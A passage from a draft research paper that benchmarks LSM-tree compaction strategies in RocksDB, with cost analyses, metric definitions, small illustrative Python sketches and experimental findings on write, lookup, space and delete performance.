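    # Tiering keeps up to T sorted runs per level, multiplying the cost.
    runs_factor = 1 if layout == "leveling" else size_ratio
    if short:
        return runs_factor * levels                     # O(L) vs. O(T*L)
    return runs_factor * s * n_entries / page_size      # O(sN/B) vs. O(TsN/B)
```

For instance, with $s=1\%$, $N=1$M entries, and $B=100$ entries per page, a long scan reads about 100 pages under leveling and $T$ times that under tiering.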
\textit{Compaction trigger.} The effect of secondary compaction triggers is more pronounced on range query performance than on point queries.
While the amount of data movement per operation for a point lookup and a short range lookup are comparable, long range lookups with moderate to large selectivity read a significantly larger amount of data from the disk.
In the presence of secondary compaction triggers, compactions and long range queries contend for the same device bandwidth, which causes a drop in the read throughput.
\textit{Compaction granularity.} A larger granularity of data movement during compaction leads to large amounts of data movement periodically, and thus, causes a drop in the lookup performance as a result of bandwidth sharing.
However, such compactions always reduce the number of non-empty levels in a tree by at least one, and, less frequently, by more than one.
Reducing the number of levels in a tree improves the range lookup performance dramatically, as it mitigates reading superfluous data from disk and also requires fewer CPU cycles for the sort-merge operation.
In the best case, the cost for long range lookups drops down to $\mathcal{O}(s)$ for leveling and $\mathcal{O}(T \cdot s)$ for tiering, and that for short range lookups becomes $\mathcal{O}(1)$ for leveling and $\mathcal{O}(T)$ in case of tiering.
Partial compactions, in contrast, always have a logarithmically increasing number of non-empty levels in the tree, and thus, the cost for range lookups remains unchanged.
\textit{Data movement policy.} As range lookups require sort-merging the records spread across all sorted runs in a tree, the position of a qualifying entry in the tree does not influence the performance of range lookups.
Also, as data movement policies only pertain to partial compactions, where the number of non-empty levels in a tree follows a strictly increasing trend, each range lookup must always take into account qualifying entries from all tree-levels.
Thus, the range lookup performance remains agnostic to the data movement policy.
\subsection{Space Utilization} Following prior work~\cite{Sarkar2020}, we define space amplification as the ratio between the size of superfluous entries and the size of the unique entries in the tree.
Mathematically, space amplification ranges between $[0, \infty)$; if all inserted keys are unique, there is no space amplification.
However, as the fraction of updates in a workload increases, the space amplification also increases, and it is further amplified in the presence of point and range deletes.
Compactions influence the space amplification of a tree along several dimensions.
\textit{\blue{Data layout}.} In presence of only updates, the worst-case space amplification in a leveled LSM-tree is $\mathcal{O}(1/T)$ and $\mathcal{O}(T)$ for tiering~\cite{Dayan2018}.
However, with the addition of deletes, the space amplification increases significantly, and is given as $\mathcal{O}(\tfrac{N}{1 - \lambda})$ for leveling and $\mathcal{O}(\tfrac{(1 - \lambda) \cdot N + 1}{\lambda \cdot T})$ for tiering, where $\lambda$ denotes the ratio of the size of a tombstone to the average size of a key-value pair~\cite{Sarkar2020}.
The space amplification for hybrid designs lies between the two extremes, and depends heavily on the exact tree design.
\textit{Compaction trigger.} Compactions can be triggered as a function of the overall space amplification of an LSM-tree, which is particularly useful for tiered implementations that have a higher headroom for space amplification~\cite{RocksDB2020}.
Further, triggering compactions based on the number of tombstones in a file~\cite{Dong2016} or the age of the oldest tombstone contained in a file~\cite{Sarkar2020} propels the tombstones eagerly to the deeper levels of the tree, which reduces the space amplification by compacting the invalidated entries early.
\textit{Compaction granularity.} Compacting data at a large granularity often reduces the number of non-empty levels in a tree, and in the process, arranges the data across fewer but larger and more compact sorted runs.
For example, in tiering, once a level reaches a nominal capacity all $T-1$ sorted runs are compacted together and written as a single compact and larger run in the following level, rendering the child level empty.
Similarly, in leveling with full compaction, every time a level reaches saturation, sorted runs from one or more levels are merged into the level with larger capacity, reducing the number of sorted runs.
Any superfluous entry from the input runs is removed during this process, which leads to reduced space amplification.
For leveling with full compactions, periodically all levels are merged together into a single level (when the saturation triggers for all levels fire simultaneously), which yields a compact tree with no space amplification.
However, for partial compaction, as the number of sorted runs always follows an increasing trend, the worst-case space amplification remains the same.
\textit{Data movement policy.} While compacting data at the granularity of a file, choosing files for compaction based on the number of tombstones in a file or on tombstones with an expired time-to-live reduces the space amplification.
However, optimizing for other performance goals, such as write amplification or read throughput, does not necessarily bring down the space amplification.
\subsection{Delete Performance} While deletes affect the performance of an LSM-based engine across several facets, here we focus on persistently deleting entries within a time-limit in order to analyze the implications of compactions from a privacy standpoint.
To ensure timely and persistent deletion, a tombstone must participate in a compaction involving the last tree-level within the threshold time.
\textit{\blue{Data layout}.} The average time taken to persistently delete an entry from a tree is given by $\mathcal{O}(\tfrac{T^{L-1} \cdot P \cdot B}{I})$ for leveling and $\mathcal{O}(\tfrac{T^L \cdot P \cdot B}{I})$ for tiering~\cite{Sarkar2020}, where $I$ denotes the rate of ingestion of unique entries to the database.
Note that, while for leveling propelling the tombstone to the last level ensures persistent deletion of the target entry, in case of tiering, the tombstone must participate in a compaction involving all the sorted runs from the last level to guarantee delete persistence.
\textit{Compaction trigger, granularity, and data movement policy.} Saturation-based compaction triggers ensure persistence of all superfluous entries in a tree every time a new level is added to a tree, but only when the compactions are performed at a granularity of levels or sorted runs.
For partial compaction strategies, a secondary compaction trigger, that compacts files with tombstones eagerly, must be invoked to ensure delete persistence~\cite{RocksDBTS,Sarkar2020}.
Otherwise, in the worst-case, deletes may not be persisted at all in an LSM-tree based on partial compactions.
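The eager tombstone-driven trigger described above amounts to a scan over file metadata. The sketch below is hypothetical (the metadata layout and field names are illustrative, not RocksDB's), but captures the selection rule: any file whose oldest tombstone has reached the delete persistence threshold must be compacted.

```python
def files_to_compact_for_deletes(files, persistence_threshold):
    """files: iterable of (file_id, age_of_oldest_tombstone) pairs.
    Returns the files that must be compacted eagerly so that their
    tombstones reach the last level within the threshold."""
    return [fid for fid, ts_age in files if ts_age >= persistence_threshold]
```

A file with no tombstones (age 0 by convention here) is never selected, which is why purely saturation-driven partial compaction cannot guarantee delete persistence on its own.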
\subsection{Summarizing the Implications}
\red{A super-short summary of the section.}
\subsection{Compaction Benchmark}
\subsection{Standardization of Compaction Strategies}
We choose RocksDB \cite{FacebookRocksDB} as our experimental platform, as it (i) is open-source, (ii) is widely used across industry and academia, and (iii) has a large active community.
To ensure fair comparison we implement all compaction
strategies under the same LSM-engine.
\Paragraph{Implementation}
We integrate our codebase into RocksDB v6.11.4.
We assign to \textit{compactions a higher priority than writes}
to accurately benchmark them, while always maintaining the
LSM structure~\cite{Sarkar2021}.
\Paragraphit{Compaction Trigger}
The default compaction trigger for (hybrid) leveling in RocksDB is level saturation~\cite{RocksDB2020a}, and for the universal compaction is space amplification~\cite{RocksDB2020}.
RocksDB also supports delete-driven compaction triggers, specifically when the \#tombstones in a file exceeds a threshold.
We further implement a trigger based on the age of the tombstones to facilitate timely deletes~\cite{Sarkar2020}.
\Paragraphit{Data layout}
By default, RocksDB supports only two different data layouts: \textit{hybrid leveling} (tiered first level, leveled otherwise)~\cite{RocksDB2020a} and a variation of \textit{tiering} (with a different trigger), termed \emph{universal compaction}~\cite{RocksDB2020}.
We also implement pure \textit{leveling} by limiting the number of first-level runs to one, and triggering a compaction when the number of first-level files is more than one.
\Paragraphit{Compaction Granularity}
The compaction granularity is a \textit{file} for leveling and a \textit{sorted run} for tiering.
To implement classical leveling, we mark all files of a level for compaction.
We ensure that ingestion may resume only after all the compaction-marked files are compacted, thereby replicating the behavior of the full compaction routine.
\Paragraphit{Data Movement Policy}
RocksDB (v6.11.4) provides four different data movement policies: a file (i) with least overlap with its parent level, (ii) least recently accessed, (iii) with the oldest data in a level, and (iv) that has more tombstones than a threshold.
We also implement partial compaction strategies that choose a file (v) in a round-robin manner, (vi) with the least overlap with its grandparent level, and (vii) based on the age of the tombstones in a file.
\Paragraph{Designing the Compaction API}
We expose the compaction primitives through a new API
as configurable knobs.
An application can configure the desired compaction strategy and initiate workload execution.
The API also allows the application to change the compaction strategy for an existing database.
Overall, our experimental infrastructure allows us (i) to ensure an identical underlying structure while setting the compaction benchmark, and (ii) to tune and configure the design of the LSM-engine as necessary.
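Conceptually, the API exposes the four compaction primitives as a single configuration object. The sketch below is a hypothetical mirror of that interface in Python; the knob names and defaults are illustrative, not the actual RocksDB option names.

```python
from dataclasses import dataclass

@dataclass
class CompactionKnobs:
    """Illustrative bundle of the four compaction design primitives."""
    data_layout: str = "leveling"       # leveling | tiering | l-leveling | hybrid
    trigger: str = "level_saturation"   # level_saturation | space_amp | tombstone_age | ...
    granularity: str = "file"           # level | file | multiple_files | sorted_run
    policy: str = "round_robin"         # least_overlap | coldest | oldest | most_tombstones
```

An application would construct such an object before workload execution, and could construct a new one later to change the compaction strategy of an existing database.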
\subsection{Performance Metrics}
We now present the performance metrics used in our analysis.
\Paragraph{Compaction Latency}
The compaction latency includes the time taken to (i) identify the files to compact, (ii) read the participating files to memory, (iii) sort-merge (and remove duplicates from) the files, (iv) write back the result to disk as new files, (v) invalidate the older files, and (vi) update the metadata in the manifest file~\cite{FacebookRocksDB}.
\textit{The RocksDB metric \texttt{rocksdb.compaction.times.micros} is used to measure the compaction latency.}
\Paragraph{Write Amplification (WA)}
The repeated reads and writes due to compaction cause high WA~\cite{Raju2017}.
We formally define WA as \textit{the number of times an entry is (re-)written without any modifications to disk during its lifetime}.
\textit{We use \texttt{rocksdb.compact.write.bytes} and the actual data size to compute WA.}
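In practice this metric reduces to a ratio of byte counters. A minimal sketch, assuming the counter values have already been collected (whether flush bytes are included in the numerator is a measurement choice, not mandated by the definition):

```python
def measure_write_amplification(compact_write_bytes, flush_write_bytes,
                                ingested_bytes, include_flush=True):
    """WA as total bytes physically written over logical bytes ingested."""
    written = compact_write_bytes + (flush_write_bytes if include_flush else 0)
    return written / ingested_bytes
```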
\Paragraph{Write Latency}
Write latency is driven by the device bandwidth utilization, which depends on (i) write stalls due to compactions and (ii) the sustained device bandwidth.
\textit{We use the \texttt{rocksdb.db.write.micros} histogram to measure the average and tail of the write latency.}
\Paragraph{Read Amplification (RA)}
RA is the ratio between the total number of disk pages read for point lookups and the pages that should be read \emph{ideally}.
\textit{We use \texttt{rocksdb.bytes.read} to compute RA.}
\Paragraph{Point Lookup Latency}
Compactions determine the position of the files in an LSM-tree which affects point lookups on entries contained in those files.
\textit{Here, we use the \texttt{rocksdb.db.get.micros} histogram.}
\Paragraph{Range Lookup Latency}
The range lookup latency depends on the selectivity of the range query, but is affected by the data layout.
\textit{We also use the \texttt{db.get.micros} histogram for range lookups.}
\Paragraph{Space Amplification (SA)}
SA depends on the data layout, compaction granularity, and the data movement policy.
SA is defined as \textit{the ratio between the size of logically invalidated entries and the size of the unique entries in the tree}~\cite{Dayan2018}.
\textit{We compute SA using the size of the database and the size of the logically valid entries.}
\Paragraph{Delete Performance}
We measure the degree to which the tested compaction strategies
persistently delete entries within a time-limit~\cite{Sarkar2020} in order to analyze the implications of compactions from a privacy standpoint~\cite{CCPA2018,Deshpande2018,Kraska2019a,Sarkar2018,Schwarzkopf2019,Wang2019}.
\textit{We use the RocksDB file metadata \texttt{age} and a delete persistence threshold.}
\subsection{Benchmarking Methodology}
We now discuss the methodology for varying the
key input parameters for our analysis: \textit{workload} and the \textit{LSM tuning}.
\subsubsection{\textbf{Workload}}
A typical key-value workload comprises five primary operations: inserts, updates, point lookups, range lookups, and deletes.
Point lookups target keys that may or may not exist in the database -- we refer to these as \textit{non-empty} and \textit{empty point lookups}, respectively.
Range lookups are characterized by their \textit{selectivity}.
To analyze the impact of each operation, we vary the \textit{fraction} of each operation as well as their qualitative characteristics (i.e., selectivity and entry size).
We further vary the \textit{data distribution} of ingestion and queries focusing on (i) uniform, (ii) normal, and (iii) Zipfian distributions.
Overall, our custom-built benchmarking suite is a superset of the influential YCSB benchmark~\cite{Cooper2010} as well as the insert benchmark~\cite{Callaghan2017a}, and supports a number of parameters that are missing from existing workload generators, including deletes.
Our workload generator exposes over $64$ degrees of freedom, and is available via GitHub~\cite{Sarkar2021a} for dissemination, testing, and adoption.
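A stripped-down sketch of such a generator is shown below; the operation names and defaults are illustrative, and the actual suite exposes far more knobs. It draws each operation according to the configured mix and each key from a Zipf-like distribution, where $s=0$ degenerates to uniform.

```python
import random

def generate_workload(n_ops, mix, key_space=1000, zipf_s=0.0, seed=42):
    """mix: dict mapping operation name to its fraction,
    e.g. {"insert": 0.5, "point_lookup": 0.3, "range_lookup": 0.2}."""
    rng = random.Random(seed)
    ops, weights = zip(*mix.items())
    # Zipf-like key popularity: weight of key k is 1 / k^s.
    key_weights = [1.0 / (k ** zipf_s) for k in range(1, key_space + 1)]
    return [(rng.choices(ops, weights)[0],
             rng.choices(range(key_space), key_weights)[0])
            for _ in range(n_ops)]
```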
\subsubsection{\textbf{LSM Tuning}}
We further study the interplay of LSM tuning and compaction strategies.
We consider questions like
\textit{which compaction strategy is appropriate for a specific LSM design and a given workload?}
To answer such questions we vary in our
experimentation key LSM tuning parameters, like (i) the memory buffer size, (ii) the block cache size, and (iii) the size ratio of the tree.
\subsection{Performance Implications}
\label{subsec:performance}
We first analyze the implications of compactions on the ingestion, lookup, and overall performance of an LSM-engine.
\subsubsection{\textbf{Data loading}}
In this experiment, we insert $10$M uniformly generated key-value entries into an empty database to quantify the raw ingestion and compaction performance.
\Paragraph{\Ob Compactions Cause High Data Movement}
Fig.~\ref{fig:W1}(a) shows that the overall (read and write) data
movement due to compactions is significantly larger than the actual
size of the data ingested.
Among the leveled LSM-designs, \texttt{Full} moves $63\times$ ($32\times$ for reads and $31\times$ for writes) the data originally ingested.
The data movement is significantly smaller for \texttt{Tier}, however, it remains $23\times$ of the data size.
The data movement for \texttt{1-Lvl} is similar to that of the leveled strategies with partial compaction.
These observations conform with prior work~\cite{Raju2017}, but also highlight the problem of \textit{read amplification due to compactions}, leading to poor device bandwidth utilization.
\Paragraph{\Ob Partial Compaction Reduces Data Movement at the Expense of Increased Compaction Count}
We now shift our attention to the different variations
of leveling.
Fig. \ref{fig:W1}(a) shows that leveled partial compaction leads to $34\%$--$56\%$ less data movement than \texttt{Full}.
The reason is twofold:
(1) A file with no overlap with its parent level is only logically merged. Such \textit{pseudo-compactions} require simple metadata (file pointer) manipulation in memory, and no I/Os.
(2) A smaller compaction granularity reduces the overall data movement by choosing a file with (i) the least overlap, (ii) the most updates, or (iii) the most tombstones for compaction.
Specifically, \texttt{LO+1} (and \texttt{LO+2}) is designed to pick files with the least overlap with the parent $i+1$ (and grandparent $i+2$) level.
They move $10\%$--$23\%$ less data than other partial compaction strategies.
Fig. \ref{fig:W1}(b) shows that the partial compaction strategies as well as \texttt{1-Lvl} perform $4\times$ more
compaction jobs than \texttt{Full}, which is equal to the number of tree-levels.
Note that for an LSM-tree with partial compaction, every
buffer flush triggers cascading compactions to all $L$ levels, while in a
full-level compaction system this happens when a level is full (every $T$
compactions).
Finally, since both \texttt{Tier} and \texttt{Full} are full-level
compactions the compaction count is similar.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{Larger compaction granularity leads to fewer but larger compactions}} \textit{Full-level compactions perform about $1/L$ times fewer compactions than partial compaction routines, however, full-level compaction moves nearly $2L$ times more data per compaction.}
}%
\normalsize
}
\vspace{0.1mm}
\begin{figure*}[!ht]
\vspace{-0.3in}
\centering
\includegraphics[width=0.98\textwidth]{omnigraffle/Plot-1.pdf}
\vspace*{-0.25in}
\caption{Compactions influence the ingestion performance of LSM-engines heavily in terms of (a) the overall data movement, (b) the compaction count, (c) the compaction latency, and (d) the tail latency for writes, as well as (e, f) the point lookup performance. The range scan performance (g) remains independent of compactions as the amount of data read remains the same. Finally, the lookup latency (h) depends on the proportion of empty queries ($\alpha$) in the workload.}
\label{fig:W1}
\vspace{-0.1in}
\end{figure*}
\Paragraph{\Ob Full Leveling has the Highest Mean Compaction Latency}
As expected, \texttt{Full} compactions have the highest average latency
($1.2$--$1.9\times$ higher than partial leveling, and $2.1\times$ than tiering).
The mean compaction latency is observed to be directly proportional to the average amount of data moved per compaction.
\texttt{Full} can neither take advantage of pseudo-compactions nor optimize the data movement during compactions, hence, on average the data movement per compaction remains large.
\texttt{1-Lvl} provides the most predictable performance in terms of compaction latency.
Fig. \ref{fig:W1}(c) shows the mean compaction latency for all
strategies as well as the median (P50), the $90^{th}$ percentile (P90),
the $99^{th}$ percentile (P99), and the maximum (P100).
The tail compaction latency largely depends on the amount of data moved by the largest compaction jobs triggered during the workload execution.
We observe that the tail latency (P90, P99, P100) is more predictable for \texttt{Full}, while partial compactions, and especially, tiering have high variability due to differences in the data movement policies.
The compaction latency presented in Fig. \ref{fig:W1}(c) can be broken down into
I/O time and CPU time. We observe that the CPU effort accounts for about $50\%$
of the latency regardless of the compaction strategy.
During a compaction, CPU cycles are spent in (1) obtaining locks and taking
snapshots, (2) merging the entries, (3) updating file
pointers and metadata, and (4) synchronizing output files post compaction.
Among these, the time spent to sort-merge the data in memory dominates.
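The dominant sort-merge step can be sketched as a standard k-way merge over sorted runs. The snippet below is a minimal Python illustration (not RocksDB's C++ implementation), where the run identifier is used to let newer runs win on duplicate keys:

```python
import heapq

def merge_runs(runs):
    """K-way merge of sorted (key, value) runs, as in a compaction.
    Later runs are assumed newer: on duplicate keys keep the newest value."""
    merged = {}
    # heapq.merge streams the runs in key order without materializing them
    for key, value, run_id in heapq.merge(
            *[[(k, v, i) for k, v in run] for i, run in enumerate(runs)]):
        if key not in merged or run_id > merged[key][1]:
            merged[key] = (value, run_id)
    return sorted((k, v) for k, (v, _) in merged.items())

older = [("a", 1), ("c", 3)]
newer = [("b", 2), ("c", 30)]
print(merge_runs([older, newer]))  # [('a', 1), ('b', 2), ('c', 30)]
```

The per-key comparisons in this merge loop are exactly the CPU work that grows with the amount of data per compaction.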
\Paragraph{The Tail Write Latency is Highest for Tiering}
Fig. \ref{fig:W1}(d) shows that the tail write latency is highest for tiering.
The tail write latency for \texttt{Tier} is $\sim$$2.5\times$ greater than \texttt{Full} and $5$--$12\times$ greater than partial compactions.
Tiering in RocksDB~\cite{RocksDB2020} optimizes for writes and opportunistically seeks to compact all data to a large single level.
This design achieves lower average write latency (Fig. \ref{fig:W1-mixed}(b)) at the expense of prolonged write stalls in the worst case, which is when the overlap between two consecutive levels is very high.
\texttt{Full} also has $2$--$5\times$ higher tail write stalls than partial compactions because when multiple consecutive levels are close to saturation, a buffer flush can result in a cascade of compactions.
\texttt{1-Lvl} too has a higher tail write latency as the first level is realized as tiering.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{\texttt{Tier} may cause prolonged write stalls}}
\textit{Tail write stall for \texttt{Tier} is $\sim$$25$ms, while for partial leveling (\texttt{Old}) it is as low as $1.3$ms.}
}%
\normalsize
}
\vspace{1mm}
\subsubsection{\textbf{Querying the Data}}
In this experiment, we perform $1$M point lookups on the previously generated
preloaded database (with $10$M entries). The lookups are uniformly distributed
in the domain and we vary the fraction of empty lookups $\alpha$ between 0 and 1.
Specifically, $\alpha = 0$ indicates that we consider only non-empty lookups,
while for $\alpha = 1$ all lookups target non-existing keys. We also execute
$1000$ range queries, while varying their selectivity.
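The lookup mix can be sketched as follows; the generator below is our illustration of the setup (uniform keys, with a fraction $\alpha$ drawn outside the loaded domain), not the actual benchmark harness:

```python
import random

def lookup_workload(existing_keys, n_lookups, alpha, seed=7):
    """Uniform point-lookup mix: a fraction alpha targets non-existing keys."""
    rng = random.Random(seed)
    existing = list(existing_keys)
    missing_base = max(existing) + 1           # keys outside the loaded domain
    workload = []
    for _ in range(n_lookups):
        if rng.random() < alpha:               # empty lookup
            workload.append(missing_base + rng.randrange(10**6))
        else:                                  # lookup on an existing key
            workload.append(rng.choice(existing))
    return workload

keys = range(1000)
w = lookup_workload(keys, 10_000, alpha=0.5)
print(sum(k >= 1000 for k in w) / len(w))      # ~0.5 of lookups are empty
```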
\Paragraph{\Ob The Point Lookup Latency is Highest for Tiering and Lowest for Full-Level Compaction}
Fig. \ref{fig:W1}(e) shows that point lookups perform the best for \texttt{Full}, and the worst for tiering.
The mean latency for point lookups with tiering is between
$1.1$--$1.9\times$ higher than that with leveled compactions for lookups on existing keys, and $\sim$$2.2\times$ higher for lookups on non-existing keys.
Note that lookups on existing keys must always perform at least one I/O per
lookup (unless they are cached).
For non-empty lookups in a tree with size ratio $T$, theoretically,
the lookup cost for tiering should be $T\times$ higher than its leveling
equivalent~\cite{Dayan2017}.
However, this \textit{worst-case} cost is not always accurate; in practice it depends on (i) the block cache size and the caching policy, (ii) the temporality of the lookup keys, and (iii) the implementation of the compaction strategies.
RocksDB-tiering has overall fewer sorted runs than textbook tiering.
Taking into account the block cache and temporality in the lookup workload,
the observed tiering cost is less than $T\times$ the cost observed for
\texttt{Full}. In addition, the point lookup latency for \texttt{Full} is $3\%$--$15\%$
lower than for the partial compaction routines, because during normal operation of
\texttt{Full} some levels may be entirely empty, while with partial compaction all
levels are always close to full.
Finally, we note that the choice of data movement policy does not affect the
point lookup latency significantly, which always benefits from Bloom filters
($10$ bits-per-key) and the block cache ($0.05\%$ of the data size).
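The textbook worst-case analysis mentioned above can be made numeric; the function below is a simplified cost model (one run per level for leveling, up to $T$ runs per level for tiering), not a measurement:

```python
# Simplified worst-case point-lookup I/O model (after the textbook analysis):
# one I/O for the run holding the key, plus one false-positive I/O per other
# run probed. Leveling has 1 run per level; tiering has up to T runs per level.
def lookup_ios(levels, runs_per_level, fpr, empty):
    runs = levels * runs_per_level
    return runs * fpr if empty else 1 + (runs - 1) * fpr

L, T, FPR = 4, 4, 0.008          # tree height, size ratio, measured FPR
for empty in (False, True):
    lev = lookup_ios(L, 1, FPR, empty)
    tier = lookup_ios(L, T, FPR, empty)
    print(f"empty={empty}: leveling={lev:.3f}, tiering={tier:.3f}")
```

With Bloom filters, the non-empty gap between tiering and leveling is far below the nominal $T\times$ even in this model; only fully empty lookups approach the $T\times$ factor, which is consistent with the measurements above.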
\begin{figure*}[!ht]
\vspace{-0.3in}
\centering
\includegraphics[width=1.02\textwidth]{omnigraffle/Plot-3.pdf}
\vspace*{-0.35in}
\caption{(a-c) The average ingestion performance for workloads with interleaved inserts and queries is similar to that of an insert-only workload, but (d) with worse tail performance. However, (e) interleaved lookups are significantly faster.}
\vspace*{-0.1in}
\label{fig:W1-mixed}
\end{figure*}
\Paragraph{Point Lookup Latency Increases for Comparable Number of Empty and Non-Empty Queries} A surprising result for point lookups
that is also revealed in Fig. \ref{fig:W1}(e) is that they perform worse when the
fraction of empty and non-empty lookups is balanced.
Intuitively, one would expect that as we have more empty queries (that is, as $
\alpha$ increases) the latency would decrease since the only data accesses needed
by empty queries are the ones due to Bloom filter false
positives~\cite{Dayan2017}.
To further investigate this result, we plot in
Fig.~\ref{fig:W1}(h) the $90^{th}$
percentile ($P90$) latency which shows a similar
curve for point lookup latency as we vary $\alpha$.
In our configuration, each file uses $20$ pages
for its Bloom filters and $4$ pages for its index blocks, and
the false positive rate is $FPR=0.8\%$.
A non-empty query needs to load the Bloom filters of the levels it visits until it terminates.
For all intermediate levels, it accesses the index and data blocks with probability $FPR$, and then fetches the index and data blocks for the target level.
On the other hand, an empty query probes the Bloom filters of all levels before returning
an empty result. Note that for each level
it also accesses the index and data blocks with $FPR$.
The counter-intuitive shape is a result of two opposing effects:
when $\alpha=0$, non-empty lookups do not need to load the Bloom filters
of all levels, while when $\alpha=1$, empty lookups access index and data
blocks only upon a Bloom filter false positive.
Fig. \ref{fig:W1}(h) also shows the highly predictable point lookup performance of \texttt{1-Lvl}.
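This accounting can be made concrete with a small cold-cache model of expected page fetches per lookup, using the configuration above ($20$ filter pages and $4$ index pages per file, $FPR=0.8\%$); the function names are ours and the block cache is deliberately ignored:

```python
# Expected page fetches per lookup under the stated configuration;
# an illustrative cold-cache model that ignores the block cache.
F_PAGES, I_PAGES, FPR, L = 20, 4, 0.008, 4

def pages_nonempty(target_level):
    filters = target_level * F_PAGES               # filters of visited levels
    false_pos = (target_level - 1) * FPR * (I_PAGES + 1)
    return filters + false_pos + (I_PAGES + 1)     # plus the real index+data fetch

def pages_empty():
    return L * F_PAGES + L * FPR * (I_PAGES + 1)   # all filters + FP accesses

print(pages_nonempty(1), pages_nonempty(L), pages_empty())
```

Filter pages dominate both query types in this model, which is why block-wise caching of filter blocks, rather than the data movement policy, drives the observed latency.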
\vspace{2mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{The point lookup latency is largely unaffected by the data movement policy}} \textit{In the presence of Bloom filters (with high enough memory) and a small enough block cache, the point query latency remains largely unaffected by the data movement policy as long as the number of sorted runs in the tree remains the same. This is because block-wise caching of the filter and index blocks significantly reduces the time spent performing disk I/Os.}
}%
\normalsize
}
\vspace{0.7mm}
\Paragraph{\Ob Read Amplification is Influenced by the Block Cache Size and File Structure, and is Highest for Tiering}
Fig. \ref{fig:W1}(f) shows that the read amplification across different
compaction strategies for non-empty queries ($\alpha=0$) is between $3.5$ and
$4.4$. This is attributed to the size of filter and index blocks which
are $5\times$ and $1\times$ the size of a data block, respectively.
Each non-empty point lookup fetches between $1$ and $L$ filter blocks depending
on the position of the target key in the tree, and up to $L \cdot FPR$
index and data blocks.
Further, the read amplification increases exponentially with $\alpha$, reaching up to $14.4$ for leveling and $21.3$ for tiering (for $\alpha=0.8$).
Fig. \ref{fig:W1}(f) also shows that the estimated read amplification for point lookups is between $1.2\times$ and $1.8\times$ higher for \texttt{Tier} than for leveling strategies.
This higher read amplification for \texttt{Tier} is due to the larger number of sorted runs in the tree, and is in line with \textbf{O4}.
\Paragraph{The Effect of Compactions on Range Scans is Marginal}
To answer a range query, LSM-trees instantiate multiple \textit{run-iterators} scanning all sorted runs containing qualifying data.
Thus, its performance depends on (i) the iterator scan time (which relates to selectivity) and (ii) the time to merge the data.
The number of sorted runs in a
leveled LSM-tree remains the same, which results in similar range query latency for all leveled variations, especially for larger selectivity (Fig. \ref{fig:W1}(g)).
Note that without updates or deletes, the amount of data qualifying for a range query remains largely identical for different data layouts despite the number of runs being different.
The $\sim$$5\%$ higher average range query latency for \texttt{Tier}
is attributed to the additional I/Os needed to handle partially
qualifying disk pages from each run ($O(L\cdot T)$ in the worst case).
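A back-of-envelope model captures why the gap is marginal: the qualifying pages are identical across layouts, and only the per-run boundary pages differ. The parameter values below are illustrative:

```python
# Range-scan I/O model: qualifying pages (same for all layouts) plus up to
# one partially qualifying boundary page per sorted run scanned.
def scan_ios(n_entries, entries_per_page, selectivity, runs):
    qualifying = selectivity * n_entries / entries_per_page
    return qualifying + runs

N, B, L, T, s = 10**7, 64, 4, 4, 1e-4
print(scan_ios(N, B, s, runs=L))       # leveling: L runs
print(scan_ios(N, B, s, runs=L * T))   # tiering: up to L*T runs
```

As the selectivity $s$ grows, the qualifying term dominates and the per-run overhead becomes negligible, matching the converging curves for larger selectivity.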
\subsubsection{\textbf{Executing mixed workloads}}
We now discuss the performance implications when ingestion and queries are mixed.
We interleave the ingestion of $10$M
unique key-value entries with $1$M point lookups.
The ratio of empty to non-empty lookups is varied across experiments.
All lookups are performed after $L-1$ levels are full.
Fig.~\ref{fig:W1-mixed} compares side by side the results for serial and interleaved execution of workloads with same specifications.
\begin{figure*}[t]
\vspace{-0.3in}
\centering
\includegraphics[width=0.95\textwidth]{omnigraffle/Plot-5.pdf}
\vspace*{-0.25in}
\caption{As the ingestion distribution changes to (a-d) PrefixZipf and (e-h) normal with standard deviation, the ingestion performance of the database remains nearly identical with improvement in the lookup performance.}
\vspace*{-0.1in}
\label{fig:W5}
\end{figure*}
\begin{figure*}[h]
\centering
\includegraphics[width=0.95\textwidth]{omnigraffle/Plot-6.pdf}
\vspace*{-0.25in}
\caption{Skewed lookup distributions like Zipfian (a, b) and normal (c, d) improve the lookup performance dramatically in the presence of a block cache and with the assistance of Bloom filters.}
\vspace*{-0.1in}
\label{fig:W6}
\end{figure*}
\Paragraph{\Ob Mixed Workloads have Higher Tail Write Latency}
Figures~\ref{fig:W1-mixed}(a) and (b) show that the
mean latency of compactions that are interleaved with
point queries is only marginally affected for all
compaction strategies. This is also corroborated by the
write amplification remaining unaffected by mixing
reads and writes as shown in Fig.~\ref{fig:W1-mixed}(c).
On the other hand, Fig.~\ref{fig:W1-mixed}(d) shows that
the tail write
latency is increased between $2$--$15\times$.
This increase is attributed to (1) the need of point
queries to access filter and index blocks that requires
disk I/Os that compete with writes and saturate the
device, and (2) the delay of
memory buffer flushing during lookups.
\Paragraph{Interleaving Compactions and Point Queries Helps Keeping the Cache Warm}
Since in this experiment we start the point queries when
$L-1$ levels of the tree are full, we expect that the
interleaved read query execution will be faster than
the serial one, by $1/L$ (25\% in our configuration) which
corresponds to the difference in the height of the trees.
However, Fig. \ref{fig:W1-mixed}(e) shows this
difference to be between $26\%$ and $63\%$ for non-empty
queries and between $69\%$ and $81\%$ for empty queries.
The reasons interleaved point query execution is faster
than expected are that (1) about $10\%$ of lookups
terminate within the memory buffer, without requiring any
disk I/Os, and (2) the block cache is pre-warmed with
filter, index, and data blocks cached during compactions.
Fig. \ref{fig:W1-mixed}(d) and \ref{fig:W1-mixed}(e) show how \texttt{1-Lvl} brings together \textit{the best of both worlds} and offer reasonably good ingestion and lookup performance simultaneously.
\vspace{1mm}
\noindent\fbox{%
\parbox{0.465\textwidth}{%
\small
\Paragraph{\TA \textit{Compactions help lookups by warming up the caches}} \textit{As the file metadata is updated during compactions, the block cache is warmed up with the filter, index, and data blocks, which helps subsequent point lookups.}
}%
\normalsize
}
\subsection{Workload Influence}
\label{subsec:workload}
Next, we analyze the implications of the workloads on compactions.
\subsubsection{\textbf{Varying the Ingestion Distribution}}
In this experiment, we use an interleaved workload that varies the ingestion distribution (\textit{Zipfian} with $s=1.0$, \textit{normal} with $34\%$ standard deviation), and has uniform lookup distribution.
We use a variant of the Zipfian distribution, called \emph{PrefixZipf}, where the key prefixes follow a Zipfian distribution while the suffixes are generated uniformly.
This allows us to avoid having too many updates in the workload.
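A PrefixZipf generator can be sketched as follows; the prefix count, key format, and seed are our illustrative choices:

```python
import random

def prefix_zipf_keys(n, n_prefixes=100, s=1.0, seed=42):
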